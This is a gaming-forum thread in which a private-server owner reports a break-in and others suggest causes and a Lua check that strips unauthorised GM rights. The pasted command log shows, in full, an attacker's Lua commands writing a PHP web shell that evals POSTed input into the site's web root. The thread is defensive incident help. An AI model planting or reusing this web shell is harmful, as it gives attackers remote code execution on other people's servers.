BorzZ 0 Report post Posted March 25, 2016 hello guys i got big question which made me get crazy! someone in somehow did hack my server and did use lua cmd IN GAME to upload a file inside my website to hack my server and make everyone at server a GM! look at this : i found it on DoCommand ( Commands Log ) [03-24 02:57:25][ExecWork]Cha-Chibi+533: lua haxfilename = "C:\\Program Files (x86)\\Zend\\Apache2\\htdocs\\classes\\smarty\\internals\\core.smarty.php" [03-24 02:57:32][ExecWork]Cha-Chibi+533: lua if(fileexists(haxfilename) ~= false) then haxfile = io.open(haxfilename,'a');end [03-24 02:57:38][ExecWork]Cha-Chibi+533: lua haxfile:write("<?php $query = stripslashes($_POST[\'query\']);") [03-24 02:57:43][ExecWork]Cha-Chibi+533: lua haxfile:write("eval($query); ;?> <form method=\"POST\" action=\"<?PHP echo stripslashes($_SERVER[\'PHP_SELF\']);?>") [03-24 02:57:47][ExecWork]Cha-Chibi+533: lua haxfile:write("\" accept-charset=\"UTF-8\">") [03-24 02:57:51][ExecWork]Cha-Chibi+533: lua haxfile:write(" <textarea name=\"query\" cols=\"48\" rows=\"8\" ></textarea>") [03-24 02:57:55][ExecWork]Cha-Chibi+533: lua haxfile:write("<p><input type=\"submit\" value=\"Submit\"></p></form>") [03-24 02:57:59][ExecWork]Cha-Chibi+533: lua haxfile:close() Quote Share this post Link to post Share on other sites
MonkeyCode 453 Report post Posted March 26, 2016 (edited) this is one of the oldest hacks in the book. Ideally, this isn't the actual problem. First, conduct how the hacker was able to get a GM authorized account. Some possibilities: web backdoor, sql injection, embedded lua script within the serverfile itself. Now, a prevention (assuming you use v3ctor's GS), and you alone know who your GM's are. if(GetGmLv(playerData) > 0) if(GetChaDefaultName(playerData) ~= 'yourName') SetGmLv(playerData, 0); Ofcourse, not the brightest solution, but this would automatically prevent lua commands to be executed ingame from unauthorized guests. Edited March 26, 2016 by xtc 2 Quote Share this post Link to post Share on other sites
BorzZ 0 Report post Posted March 26, 2016 4 hours ago, xtc said: this is one of the oldest hacks in the book. Ideally, this isn't the actual problem. First, conduct how the hacker was able to get a GM authorized account. Some possibilities: web backdoor, sql injection, embedded lua script within the serverfile itself. Now, a prevention (assuming you use v3ctor's GS), and you alone know who your GM's are. if(GetGmLv(playerData) > 0) if(GetChaDefaultName(playerData) ~= 'yourName') SetGmLv(playerData, 0); Ofcourse, not the brightest solution, but this would automatically prevent lua commands to be executed ingame from unauthorized guests. Can you tell me ist possible to find out if there any bds on my serverfiles ? Quote Share this post Link to post Share on other sites
V3ct0r 2,117 Report post Posted March 29, 2016 @BorzZ You have to scan all .lua files. It is hard work, so you should take the files from trusted sources 1 Quote Some useful links / Полезные ссылки Tips for making a topic in 'Questions & Help' / Рекомендации по созданию тем в разделе "Помощь" Server Advertising Section Rules / Правила раздела "Реклама серверов" Available e-mail domains for registration / Допустимые e-mail домены для регистрации User groups / Группы пользователей User ranks / Звания пользователей "Broken" pictures on the forum / "Битые" изображения на форуме Beware of scammers! / Осторожно, мошенники! My developments / Мои разработки Mods for client and server / Моды для клиента и сервера PKOdev.NET website for Tales of Pirates Server / PKOdev.NET веб-обвязка для сервера Пиратии I do not provide any help in private messages and outside the forum. Use 'Questions & Help' section please. Thank you for understanding! Я не оказываю какую-либо помощь в личных сообщениях и вне форума. Пожалуйста, используйте раздел "Пиратия: Помощь". Благодарю за понимание! Share this post Link to post Share on other sites
DevMorgan 6 Report post Posted April 15, 2016 how to use if(GetGmLv(playerData) > 0) if(GetChaDefaultName(playerData) ~= 'yourName') SetGmLv(playerData, 0); addon.lua ? 1 Quote Share this post Link to post Share on other sites